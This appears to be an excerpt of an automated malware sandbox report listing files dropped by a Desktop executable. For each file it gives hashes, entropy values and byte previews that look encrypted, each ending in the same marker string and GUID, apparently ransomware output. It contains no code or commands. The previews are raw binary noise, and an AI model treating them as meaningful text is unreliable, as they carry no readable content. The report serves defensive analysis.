              MD5:50CA5F0B7704800402E837B4A7B1A2E4
              SHA1:0699DEE04903199DE9A25F9B4D201378B4344948
              SHA-256:1C8650BD616C03CC6C0AB62682A9B87C9E779C15882A90E96EDC688DCB5A0EDF
              SHA-512:A1FE7F14D33BD842B2BECB3A13EAE20F313C23A51F9FDF617AE1BC62555A6E0612A06382A196C1AEC64B431E34F2874181E2ECAFB814C427FAB8A0DEEB3EE7ED
              Malicious:false
              Preview:<?xml[..y.W..=L...C-<}.`^...d.C%.~.Us...+ ...wM........t....P.aX....~.....x....l..Y..P..Qg;.E6.4.0........Kl.).$..ze.....{).............d..J.M....?......+|.Y: 0..:.bV]..[....5......a[.pneb......w..k.0..[.|4...=8.d.8D5\.).2.F..ji.|K.D.q?..C/.'1|...:..F3.n..P....w..QV$=.2.:i...4O1}:\..8./z..;[...v`P.U.<G`.%uy...IQD...&G<..zH.qo..JY.x..H.SS,...._Z..1....lr..]....~...Y.....7......hI8.#:|..~...Tb9....RC9.TS&..c..\.-s.~|x.E.'..qmF.$.g...P....#6.O.J.m0.#.v0.I.P.S!d7.......e...>.{......`./_y.D{q....]NS.2i!.j].....]B$.......s.2..c......J;..,<.[p...b.n#b<.p....m..S.. tn...v~.z].c..W}.... .![.UA.E[n...U.Q....m...`...xO)[..A\6G.]....d]3.E.k..{....2.....E.f.M6;....4....S..c3.^h...=D.v.M..y..}.e..~..= h.X..>..&y.d..4+.2..C..;.._.W..S.).....C.JH..}9.;.....}!...H."..'.....].......'.[.X(|.@.7}._....`..8I...~...-7..J.....<.,PHO..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):949
              Entropy (8bit):7.7645637377962435
              Encrypted:false
              SSDEEP:24:o7km+gxt5VmyNCX3Hg/j3pYOBg6d5FeSucEgSy2qUbD:mkfgjyHHgzpjBg6xp0D
              MD5:47C27239578A63A92F5755E2E301AB7C
              SHA1:067ECF45CD3DCEF1C950BB5FFB7C37304898AACA
              SHA-256:EC0CC2BB3C23763ECFE8B7C267BCE310B06389FD851144BB8AB1FA5C9E0F83D6
              SHA-512:459E1743DDE6E372BAEA4480527A24182BD895382A926C6C4EB1048B510D4F1A31CB1AF098F436A9069F3666034A267679856507E04EE9B7A5F3E6B8B181B4D1
              Malicious:false
              Preview:<?xmlU..z..@..:..8C....q....?/........-..0e....b....s.....K.8....._..xo.+\.%..X.....)HsZ..U....Rl..'.=.PEf.{...e..O.....K.3M}*0...).K..&Py..0..I.......H.."...c..*'.g!)......O.e...\v....p^yY.....l7...?.C.]L....k.".ikC..-..s=R].S.T...mK......IV.'(.LD2....<.>...J.k.'E.....R.|R..5q]...3..Uo.r.{......^.....K.He.;..'..f<.D....(....:......5V4..n6.$.c.#G..q..3.....=Z.0d1Iqp.e!m...Wk.......f>B...............k...4.D..........IK........1...lHL......e...-2...X..PP...I.Zu#M...K..S.h..t.e..Uq...IV.#..i&....V.bl.$.8;..G...a.P.....Ia.9g..d4H.K<I....O...f....0...g.. A...x..Qt|.Q..Y......T.u_...M..Hu..o..uBS.;.U.1...sr..."..f...EQ...|Y^z.0h...5.P..@7...a..[!P`.B&..fFl.....c.Y..|...g^kn......TN@.........1l.Yv...$.|..s.u..tg>.-".......J..kiJ.Y.gU.e./.....|q7f\.-.>.....2%.F..JO.P....?V....g.*+,B-l..'.$...J.....;...G$?..s..I.`)....a.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):867
              Entropy (8bit):7.7668855595012
              Encrypted:false
              SSDEEP:24:FEXxaUVnAAeH1YWATNBw5Ny+v4QS6P2M5lnPbD:WrVAAQ1uX4y64V6P95lTD
              MD5:76E54663D019C2470846B6B84B1D0DC3
              SHA1:519021CF6C0672A65777015152CA183CA2820D74
              SHA-256:1B2EACED1DA6212B6C59D132FC52AA79A4CBE84332CA9E0AB4E5626E70CC87DA
              SHA-512:8FD98C9465C88CAD989845FD8723CFE572F984545D7DC86118401CF1E2202F63FFCD5DBB0838FD616A70731C49625FEC82ACBD8B19AA80EC4D31DDDA628D0E83
              Malicious:false
              Preview:<?xml.|k....}D.M.f]...-..WA.7.......-u.<G%N.BV=.-...-'..4=..;...[..%.......2g.......G.]....N....8.5t.0.0.d.6.,2*..0...-!........E.....o..0p).?.....7.8...{SO.Y..a....X..5A..'.."..v..#y...'S....j...x/...s.....f.D...........?...|.........xg.z.. nn.(..$na..QQ1_.c..5.P_..f......d....Yr....t.|.[u.%./.#..t.~...3I..P.O.1b.9......{{.}jbk....~...3m.p.j............E..HL......oV..cf.`.Y..0.>....<.....K#~5:....=(.....k......-..n...r....o/.... .-.X+m.K<U.........k..C.G$.wP...x.ptbyP..%W...T.....H2;1S.>7.e.^...~v......5..6..d(]..-...4.D%..2.Eo..L9.*.....HY.g......q.....<:.eci^d.jR..FY......."V...2.u?O.R...OO...2..4D../.>.S{.s....~.s..It66o$..#..G..|..{...[..../...$..s!...r...{..*....7.C..e.(.;..M.5E.yq\o5?..t{.....lF&.3..\.Xp5..........3.....V..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):918
              Entropy (8bit):7.764916914796036
              Encrypted:false
              SSDEEP:24:yveewbfLQ0enw4TY/Y9z3VOJ1sU2OTHwYaZbD:AmQ0K1z3VOJGOrID
              MD5:0686423C4FE2A1D226CB47D4379EC805
              SHA1:56E9B0A35BD9B319C00537562A8CFDA093E70A5D
              SHA-256:6F593548CB8EE1E700FB1B1536C0BCFAF6F6ADFA9AE63A443F6C476D6C6DE67F
              SHA-512:221DA2142D82FF488FCA209B9C8E8CD7E640069AC1489343C8D50436C84FC5E52FD0F6A7E443AF57D6B1E2C0CBFE3C1D41B1F830D870B51DE212EDEA27F76569
              Malicious:false
              Preview:<?xml.E.......~/..d....T..M.T^..]....._...w1...S.jl<20.C...Q..;..X....(it.Y.+.F....'J.".pECe...ow.'.Le.....+M..t...n}..?.7cU..s....V.rp..Yk<..P1T,E..,........Vqg.=..?..r4l...v.,..........O..;.t&.3.p{S]..+.(s.....n9.cT2..q.&.P,...b.^(r.......-.c..F.o...x...-y.....\._....B8..w.#^:..V.......d..H..> ..6J.w<J.V).6.Yg..2%?.*..s(.X.i..%^.....;.\..}.'..EsI.$.....*..X..r...Y..=.~.L...7m0.D.k.)s..FLj.Z.R9.V.F....../..:..g..1.3.O G..|P.G......_.@....9......5..`..Z..g.._*.Fl..*E..T......%..."}..'.....W?....2G.G..t..._d.....e.+H...r}od..2.'.a...R..t..^.#iw.q..G.^.e.3..k8.b......<.....dt8..F.o.u....H.-..b............6.m. ....0..N.=D?....Y.U..##R..c~z..:...x.i->M6......a.{7.....0..7P.P...@..R......0wF.......x..'.E..|.%^e}.{...-c....A...S>.|..1....@.:..8..6..3T.T)....i3U..9[...&......V8.<+X...N+...TZ.q.....G&tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):898
              Entropy (8bit):7.750587634720067
              Encrypted:false
              SSDEEP:24:6058O3SCzuJoVItmjcKWPBDxMUnNhuSDcfraqzbZgrJvbD:6DO3SXEjpqrZWHfmC6rJzD
              MD5:4B5BDDF17D896870660FB29BA85CF36E
              SHA1:3646DCE9136E75C3519C11331AE9CC9D47BDDEEA
              SHA-256:E508C8A1A5137D34D2AC5CF8C8E58960E56918A0DAB8A80618097C26A7223B72
              SHA-512:6A5DBC42E796006E307D6B31328F2EC2E1BBAB3C53384CE354E30E07096750E72EE524F8A93765FBD6AA8302C531A98A0FEA4FE30D47D5C2A8E43D57469DCC4D
              Malicious:false
              Preview:<?xml`X.i[..j.....M.R|.OB...H..uN.L......2.....~~....;..DS#.D..p.L..i.CC..E`c.(c.4....W...X....+\5....Q......my....i.._.......O[D'........\..Z...4.&i.....8...jn...........Z.......}9.......4...t^.S......2L]....z..L.......5~....H.&>..3..9...0.,.u-..dk-..4.;..w.NNl*.aA..b..5g..B.=...v.....0.q.D.*...ms....-hE..-.u.)-{...5.s....s.......L/:^.-...;v:......S....k..n...<h...K..u.y.`...vm..[.Lk.6...;.|N.R...........S......m.,.5.9.\b....mh..:"...:U..TKl3.......3................O..7.(]..].....X.....]..W..jm...CS......_L.DN.U.3.<.R.....X..H9o~..Q."u`(.....I.0..%T.B...jA.).E....w..z.G1|.;Q.=.z-_.M...^9.4.\x....k...H..#.t`.Qe..].}...B.. .jm.8.../..hg....jX.........Qly.,...=...r....{..t.k,H..%.z..>.}.=..:!...m3.......v..wl.mB..C..K?.?.[;3...}.S.Q.;q.$Y....&........x.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):798
              Entropy (8bit):7.7224359187581575
              Encrypted:false
              SSDEEP:24:Hs1kyg3zDSeSRVREfFAfnjDNQXQixtLUtbD:M1fOKrW4NQMND
              MD5:1DC9D6B0081E24AE96D066AB0A5C3E4E
              SHA1:623BEF22FEF6E15B7C781DFFEBF2FB62D72D6D47
              SHA-256:917A812A40D5056CB52ACB72F51CBA76667CA7DE0290972B977C499005C41215
              SHA-512:BC2F5C7724283C383FA9A769547B9D0E554791F30CD7FFF37AD1F04EBD40C2C3EE9FE223B376D4D163AEBE0E8428761A764D5C159EBEC6D4F72F648AA2B8F4EA
              Malicious:false
              Preview:<?xmlH.......N......=...8.!..2.9...J..)..7@S\..T...w...H.h....7.j....[..$...?.?..9.C1X"-...bg.....t.u.[:b-.K.........@......YB...../-......l........pz..g'.A...(..d...C.qlvD1........wH...!7.^L...T.L.m.|..V...?....]...}f...d..R..Q.7...y*S...M.g.....+2...Xz&L.#........,.H.,7e.....!W.,."4Q=l..(W^.OT.W.s.w..r.}.mLT..yp.g...M.f....*.lB}...:....d.....'...R...o............R..A........L..S..F.....~..mL..B.............k...P>LI`....1..e/.;./..+2.....\+.^.[f....OO.-.F.s..~L.._@......l.u..n..........'.q....$).BA[!.S:;..^8!xt.L._IFT..L.....C.j ...M.."..X..._.?...)n..P..T....{w,..YS..zq..(.D.4.E.... .%................8.?.i..(..Za.y...n.z.r..?..~N..v.~....\m5..S..z.cJ.S....u[......w!...q.}.Yk.E.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):788
              Entropy (8bit):7.7014145218308
              Encrypted:false
              SSDEEP:24:gLDyQunwkuMX6SwVmaeDn2LYnjADdbWnLU+LAbD:gL0wk5XlwEDqYjARWnQ+GD
              MD5:5711AC773983EFCC04117271D51A2805
              SHA1:8362C00B4A8731E7EFCF948D7C431471CB97D55B
              SHA-256:81737556639AA0AB37A5483D4C6E79EF8486B0933FF451B712B5923BFA46A956
              SHA-512:C38AC32248FDABE09E2FBB1C29195A3FC8CC7C8C99CB66FFD1FA5A087F0B9A5A7F98D960A522557202F803171C743D85BB5CB354E8CCC73C586B40A529CFD4C7
              Malicious:false
              Preview:<?xml](7......K..y......;..ey..r.....kCM.....KR.a[..8..W....++.`.....=..Z..o.8<..B.?...h..5..m.`O..[=d$t.a.E.bj!.f...B...i..J>..&KC...d[..k.#..V./.c!.i.........]:..t..TZ.a .!l....[..Zz..^K.E.....D...PD...|x..8..`...dv.@u..Q...]dP.z..v6..4=.$..fJ.....6#|_...4.."....nq.H$...*....;1..v...?.`.i.....q.w....}`l.>.)ee`..)!J...c..hs.\..r.:..I.O.4.:....,..`.N.,.@.p...TF..J.&.d...*..8.>...L.N.[T&...d...m..nk..y{E.....}.1.ca...e...CL.{.(..z..zAN"...^...Aj.B3[Z..mz.@4..8....[...[.....k....Z....b.H.h.4,.*W3$.9...D}g:.&s.X...M...R?....Mf/6)..b.g @.bOM........r9..v[.E.U.K.?{..O.k.......cwI...v.YB......mS..Sl.......}...F..-u-.[t...Z.7....2..E....d}.....62s....s.2..?..e.4....C0..*.ptp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):987
              Entropy (8bit):7.810731827397196
              Encrypted:false
              SSDEEP:24:i4TYyxHhkDyuIFvw7fSbB88IQ+dwQvMZqNlbXhioB6bbD:i07SDyuC2WK8ICQEohrB6fD
              MD5:CAEF5DA7850CF5D28B40AFFE2362F301
              SHA1:3F411FE8EF502E7A5B3DCD6C5CD9731FB2716913
              SHA-256:A5B099EB464E64B6687D26AA0E33C9D711BAD602BA5E8AF9C05122B5279A6017
              SHA-512:AF670ACEDF3134CFEE87C802049839BC2FEECEA086C7529F5B0DDE8B4E31CC68056168E079E5A4DF7556AA41DA034ABE2DF3BC836F77360468C6A8915192C2F2
              Malicious:false
              Preview:<?xml!{.P..r.t.Ak..Z....YTs.X. .....E<..%.S.r..(.....7...).'.l.z..O:..&.?..........$.tk..-...T......{.6.<4....z._.q.sE.&T.. ;..'.C..4H......:.x..a}.P...(H..oV..M.?li...F..A....<.....+..L....x%.CW....X.iI.....;...P.MW[..^..\..K..l.b..-[F!.c.n...F%.....R.3....{.&...L.....Vls...3.H8..b..E.(.n...+.>......??.F...[.OYn]..b(...>.........z...nb..0.F.d3.Y...,@........;.].`..#..?......9Y1=.A..".F....="s.o....Jm.C......U./v..wM>...k..&...jJOfN.....+.2.w..Z.5A.7.*H.`. 7tJ.......5dV.CDt.qt.....4.XwF...K...(...%.DC....p..4.RN....&...S..L.........*..............d...N..@.{.l...Pu....\.X .X...1(9..@V.....8..........Q...D.*.....&.O2.....t.m..,.b....l$Q..K..|}.^....O..<~<.=..3.."..c..ap.#...+%*kP.....;..._.0.......&P..0...r..B..uZn....t..e.]h.T..6.p..........Ckn.f..8...fu....j^...p...4|(/b.G.#K."kq$..Sd.....N..\V.....<..d.$..r. ....Q.....c.]@.b.H..v....m.....;..0.yH.W.o.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):996
              Entropy (8bit):7.788689519564935
              Encrypted:false
              SSDEEP:24:Xv7Ke2UnOTihxjcUYoYakUQsfD+bk8xAEOU0RYbD:TBnZjcUYoYPskk4AxUgCD
              MD5:E52A23DCB772F76C4109E80B7D756376
              SHA1:7D4F294D6AC6F821B1A8FED34E4E754BE706F83F
              SHA-256:3C091656F07D2D2DEA6ED6C72CEE302A1FD1B0E303975A882C3656C0AD9F87C3
              SHA-512:3B4F22E8480A6404EF7107FCB4C013889AB050FBCE62ADC2F4353D336B3CCFCF20E0D8A4451530DA38EFA2731C8E983EC137CF09151DF771253B075614BB01C4
              Malicious:false
              Preview:<?xmlX.E...W@......a.FZ.L..gvv...83.U.-*,....xP...-...^|."..s.......I_.|...;.{..*"..[|..m.k../Z.......*......_9.......x......F.ys.H..B..s..`.W[......T....J..... . .b..o...D.d..w...V..Y.9..S..H...[H........mMs.x5..W.d.....b.........y&.&..."j....G....z..`..d...;w.t.[6z.\YB..'z.x1..h...sT:..n....:SV...p....ugIM.;0&.T.}....7..;4@...CgW...f...A......_.......E]....7...)4....'`.S.v$/&..].......>.A...h.tb..j3.x..f.E.z....L....#4...\.$Ht.v)..?....[..I..V...RU(..@..(.yOz+O.E...Yb%.Q..L..3....a...E..O.........-...Q...c...V..K..'$.....FMcx4.ac..4....E...W..}......Aou,kC.@.q.qp'...`....b.W.TSpg..8./..Y..=&(L......LN.....0.T...{.I ..N...|..jD...T.......j..+..-$...,.......}.X..>L2*T.Ab...#1$......5..V.M.../uXU.CsX.05.<..n......B..g.gR..f....-;.G..c<).R..=.l..`.pEp..:H.s....a........$O...3...<.......(.Y.1...&Kw...' ...N...>..t..s...%>.].@.#L..7J...x&.X;..Q8 .......BOy]...E.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):893
              Entropy (8bit):7.804663389475754
              Encrypted:false
              SSDEEP:24:dzRl/Rp0q819XAWLTPf+D1Y/buwLSUMbD:R/30q80YqDybLLnGD
              MD5:D9DD3552E738674280A1DFA9375B7B15
              SHA1:E043E7D696DB17C9176B29DCF401082F5D960432
              SHA-256:336A59D0F8F92B21D36D900CD83CAA003FDB2E86431A11D4A728BD2943895687
              SHA-512:62120751A5E015EDB6CF44CB5CB958FCEC43D197CEEBA9A03FA19ACF7D7975395E1E6555B1FFE64C26692769E1BBADFD6C931C5B3C377990DDDCFCAF27F9D2A8
              Malicious:false
              Preview:<?xml....[G........;nb.'...U66]...B.~...0.....B$...........:K.U.^>...+....a....a..&B.C<..*.R......R..2...)e...."...eS.....=zU.8..$..s.u.........H...]..Y..n.V.*..!.a.....b~..6.3D.:.....)...Q{[.p,..p./C.}+.0i../.@..._.f>.......1..=.e..O....(.6.X.h.w...f.\....E..8.]N..o.!}.......n...hmaf.s^..)...4I....i.0>..Mh*.c".u$.....V].@.s..Vs...aN\L4....ri.X.3.6...&.bx.....D.<...o....MtD...H..z...YIQN.}...x.)~m;,.0&.=.g..>.7.+..{$\?-...=.v...."..E..|.U.y..A.k.d.P.. ....^........u...nl......O....R.........wf....z........^.L.I...... =.OXw..K.v.j|u.|...4..g...a'..I.k^.....:.,..._....:...K...k..|.#.K..@?.6...]..u.....[.$Tg,.k..+X.....~.......|...|I...x%.Gb>..1+..../..u..Jvs........Z.7$....H..%'x..}...........R.$._....Z..z..........?.W.t.x.a..u.>...L...)..8...~.dk.r...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):799
              Entropy (8bit):7.716984447971532
              Encrypted:false
              SSDEEP:12:9DTADiXfzNB4v6GhX85bSkMNoOLJutesDaAiXq8AFrH4nO+qukIcii9a:9DTADqJB/v6okbsDzYXbD
              MD5:C7C31DC673D7FDA5BFF1CA69E0FF12C1
              SHA1:2B8E325404BC519158F991085F5A4E13F616E833
              SHA-256:B22164DE7ABBB04209662DBBA82D3E07FACA54E69E2E85A9CE1670E3C0F16069
              SHA-512:130001AB886F7D19B7CE0BD8F459805FEACF3B4DE4932A9083CF821849C2389DD5E71E3E1796DAE3EB9778CC37C4DB38293070805E4B329A0B41E2AA1D09B0BF
              Malicious:false
              Preview:<?xml....>.Ds.kuj............/..G.....H..r...g.o'G.|<~..su}.l,.\."M..wQ....C......._.n*p...e.M.=.%....a..#......d`3..Kd..0j.L.n....E[..[F^.).6....~.v..5M....NO..x.F.r..-]27/.,\.A.ui...E.P.OS....kp..z'O...i.9YY.<.RL.. .V.......U2..Z..0O...2...l.>..P..<.g[~L\..C...g..~.G.}......=U.S....U....[. VbX. ...L...sS..jA..afV-."Y.72.-...."..."fv..yJ...Gr.#l.+h.z4i..\`U.4%.Kd.c...L....D|..'.r`.7;E~6....qc|.@.d/.}Y.m.....k..D.<.....F.....O3.p........;.[2.X.@...$w..+......".;..k.w8.Y;......u.....w..q......~......]u..!.<.6h......^.I)..!..f.E.(....5..o.S+.o.j..).5iv.P......1.ANU.h.F...?c.>.D..H.b8"..I.bO...0fnF......Dw.B[ Z.........:.7`.)?J.bD9.5../..C.eQ....?..x....l...wu....5.....ns.5..x*.[..ktp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.733033839231227
              Encrypted:false
              SSDEEP:24:rl1cWPz+TzKoQV0U8l15WFp4ywiDNT9yBe2+c/bD:rTXzK5UC15Op4jiDh9H0D
              MD5:706DDF08603071A4C2CCAA4FEB227F70
              SHA1:3509DF3034A0A4551E98AB8A4F661159F88D7FC7
              SHA-256:3238071AC6ACA40AAF02753EB71AD544F0E8747E61C49D330029A99D21DA37FF
              SHA-512:CCAEF16B3877295D6801DD7D2C009765FB773159C9650EFC36B6118D27F83287E49DE472FE031B49E8F689558D08A176A6D259357E7089FE959CACAB3EB241D4
              Malicious:false
              Preview:<?xml..3.>...t.6.B..V..1...]4..O.1.J......H..$......s.G.t....+,......n.#h..Kx..olF..h...+.rhk..w......X.=._..mAS...F.'2...H.wr.r.p/.,...K.>...!\..ezZK.6..2..q.......|....yS.l..2P....g-.........iU0....V.....f.\w/..<.....D-t....S....%.+.v..R.9.[Vq........7.Eh..R9.....<.=<.G........(.....~Z2.8O....1...&!...>6.....@.EI....+..x.e~..~x.VL..9....B.y...24..T=D.*(Y#G.r..I.8'...w...x.w{............MX.|...3..Zx..$....j..HY.9.*.5.../."......@N.Y.g...V.....{....].~.).$c...|Z2..t.h...&..m.K'....`.2..d{n........F......d.T....70...h..Z..v. NW.Z...y...Y..P:#........8....|.H`h.<..F.\j...o......$.S...8..$.#o..a*.Z&V......-..7L..W...Rxa..H.qzS.Mb{'...X}....'..l.....w....>ZY.@mH.w.j..-....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.750580796095534
              Encrypted:false
              SSDEEP:24:LdEtiT20VaMfjOu2fNcG5eXEzQkuhvambD:Ld8y26ieXUQkuhva0D
              MD5:1A34052787585165876FD0BFABB24E45
              SHA1:D5A328CFA67236A8E962C69DCBF2330EE0102AAF
              SHA-256:8371033AE5EF7D497C7AF48B4854026665FA3ECF7E7B486453496D64328724B8
              SHA-512:5E7D53B4F9EDB2A6A768B7E69DC1F938DC391209ECB4586780041CC9D0C8C70200CC35E9D88C7D48ADDA2C6AA45390398CFD314E8FD2A9C8D711A553147F2B6F
              Malicious:false
              Preview:<?xml$...G..a..In.2i.[.q.....a..^,..cI.Vq..X..Fy.a%.3...... ..6...&.....;.x.R.U.D..K.......L...#N..1....b.tJ.x.\.....3pC..X.....E.5....-.....:............O./...:T..M..I..S........i<....%..O(.+DG&.V........[!]@...l......gXlJ...v......;...E.....j>y...t.W .M...zp..A...e6J&.-.&...X....`?.b....K.=D..Z..4...+....6..!q..........<.....g5..4.....O.@.".C5s......#.U0} c7..:Oq..q....'*.h.Q|@..../...A.....J.>.|Q...\..B.p..m.uG.../...(T.)\$..Gv(........b.y.+RLW.=....G...c.....#..|.........].@o...r.DS{.-l1~.%.!.9K..63...r.../P.....|.%y.L1i.u.$....d&..y.b59.p...b.:..K.'....9. e...O.xv.hRV...8T..%{CH.x~e0.7W..\.].OT...=...J....Q..^-0.Y.\j..y.a...~.o....R|.#...~...'.X1......p!.VU.[....d.N.. .Xtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1029
              Entropy (8bit):7.8113161219448255
              Encrypted:false
              SSDEEP:24:68BGoOZQL6sdmfhwc3bDoGr0BC8DFhBGjho+O0bD:Lw98QhL90BCkFbGGReD
              MD5:ACB0B0DEDCCB0DD838C2D8A1992EA650
              SHA1:31CF1D8E05D325D29F7DAD822FD408EDE6B8F6D8
              SHA-256:E5A8BA82F679314DCCA9FC41C4A537081B481CF5A1FCA103C12061F230C2DF9D
              SHA-512:9B84C42D77944ED846850092AA84A4303ED7A61EC0878C13626E4C826BDC2DD0FE9C82AD1EB52B37EF83466C6FA069174BC74928FCE9598A5B411D3FEC4B062C
              Malicious:false
              Preview:<?xml.l..2.U.G..G..z.8rO$.........|....T.....K.N.SVa..j..n{;Z......L..2.,s..[*..8.}........V......?..l}........A9....Jr..U^2.w-.;_7P.Q._.M....l..........M.{.S......L.o.y.?..v#1.^.~.............G.-..B..k...1.u.....MW..0.!..zv.0......J.$........W.0.~...Z...NR...........:!..z.....J^l..[..^...m.)....a.P.%.....l..C.%.t....Q...m...&M.'.. .&V..XS...1....C.....{.$..<}......4...f)...}..}..Q.........>N9..&7z..s3....9.G.@.0..1.g......`.V....|[..SV\J....3.Y.z..k..f......F.....]T..t.o...V..nG....l9^....,.Y...........~5!V.fGK..7q....9.n#.%.x.h.p..p,.x|..$.^.&...wN..+h..?:..,.l....v...!..F..]Q ...[...K)Rp..OI.8w\........A....4.S.3.N.p.M]U).=2..d............4g|.....f.....|.vz.H,.F.-..... .j..n.`wK.j4.fJ->BD..C...IR.%..i.r#3...v.J./....)&.C....IgJ.s|.Hy.f.jc.HL..O.oe.\m.<....}.j...h|%......t.......5".#....v..|...-..!z...P.$...2.L..jA2...%.n.b....-.qf{.5..g..0.......s.+4.0..W....j..!..;.>..rQ.X..itp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):871
              Entropy (8bit):7.761092011922987
              Encrypted:false
              SSDEEP:24:qq3LLr2Gmam45NybZSoa3td0xB1YVpCAh/MbD:f3cPqNe/a361jiGD
              MD5:20A2B7FF133253E66A6D14AD39C31BFC
              SHA1:96D9F8DA2EFD36729773F4F88EF0952A6C15F2AD
              SHA-256:BE497E6D06C84729EADDEBA22CB5341CECCD9C9B4E465483D4865A8B2CA2AC05
              SHA-512:A8448C53B22C12C0504F39BAB6246951793FD2B8A220050D56D175728616A8C65352CD8FFF4ED97DCDA89EE36EA5469A71B783886E1ABB29E936D9E4FCC2DF59
              Malicious:false
              Preview:<?xml.....A.~F......k...3aB.2......cT./8....zd.-.6o7)./+W,....c#.|8....#;/.....^.....z....2..W.p..."e.0.b>m..zuk,.hy...........YZ.:..L..?..pVT5kR....+.#......OK(...e.........f....mF@X...w...q.}.BX....b.'..FP&.#...+..[x^|........eQ..fL.X....;.p.~..`..m..N..-%g..V..4o.;.&..E.!|.i}..t.C..=F.....w....;.-z......I.Rh.%q.h7.E......w..#.!&:...>.....h.W.....}2B.z\ ......C..*.rD..0./..,R.bs?....Z....L.=....^. a..;.a.s4..g..<9G.z..u...]^..R.?.G.|.!..p..;..~./Zf.T.^..r..i..}I.V..."..gN.x,..q....$....Z?.(.Ffey..[..9c...W.C...........sn..}.>.Sc....4f..;....M....(..i.j;".s..I.J.C"wn...)......r.m..]\a.?uQ.__..RQK.w...7..j..,..e.@.].X(A..E.Ky..N.........H....%................|A..R.z..M5.s.=....."...K..n.N...{^ ......K/.:z.g...\un.WLX.iy.........*..'tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2217
              Entropy (8bit):7.914441119327499
              Encrypted:false
              SSDEEP:48:QQlYPdfdmWMxSLPCZI6KPsM2Da1Y06/at6P2DA96E3LHpD:QQk/mWMQLC66KPsM2+N6/T2SjB
              MD5:DE8DC16B2FEA0C6DE485EF5D853C8158
              SHA1:D0F53AD93349CD7D31D232DBEBF06F538465A27E
              SHA-256:57E42C55D86B535E78D0433185E164E24D360F1C320FFB3707B5C2C8A09695FA
              SHA-512:63F6FE3F8C7BD44DF2DAE9AFED4679A05670DFA3E527DF33B04CDC6FDB224E1CA50E9FB3B9B7CE21A12C4D92516AA936A13D5BC2DE728E4321A9C1B5A8FF4578
              Malicious:false
              Preview:<?xml*.....[l....3&..o...s..w_..8...@#...........>..4.e.Y.C..[K...A...........7...........j.: ...K..Y..!.su......B..Y.8....2........B5.Doy...w.z&.A.~...T..._>..Nw.l2.^+a..(.Gk.....FQ.Y.`v.eo.]1..w..."..l..K2t..."g.#;......(.......}...K7..MA..m....s....9.e..Q..z.{.E...^.......X.....I.....@.T.c' =.i2r.........[ipg..N.).B...1..1G.e...-q......Uh.(..,.....U..c0.....w.Nk...lH..i...B?C...&..4|.<....by..d..m.)~..2......9..Gt..X1....{Z....%U.\.....~'.].8...'....=K...;.F4n..g'tq!....m.U....GVQ)..>...Rz...\E...Y.'..>..&"....wk.L..y....F..WA...M..H...:.0/M1.L.?.w"v..X...T..G~......i...>.S..l..3s.58...6..".s*8.l..?.....e....^.XQF.j..n.{.,..W...K...m.E!A BJ.....[.Cx.I.'*.w.9.);...f.....(| ig).....!u.........._..>..bmmh.7....`.{l.h..!.T.pg_.6.S...1....TY.S/o.H..p)~t.uh..`G.T..v...D...Nk@".c.......n4.."...c.S.Z...@..s6*.B?...30%....._..'....l.].[.$..o#@.?"...I...i..$.8....i.v..Dp.p]...........k.. 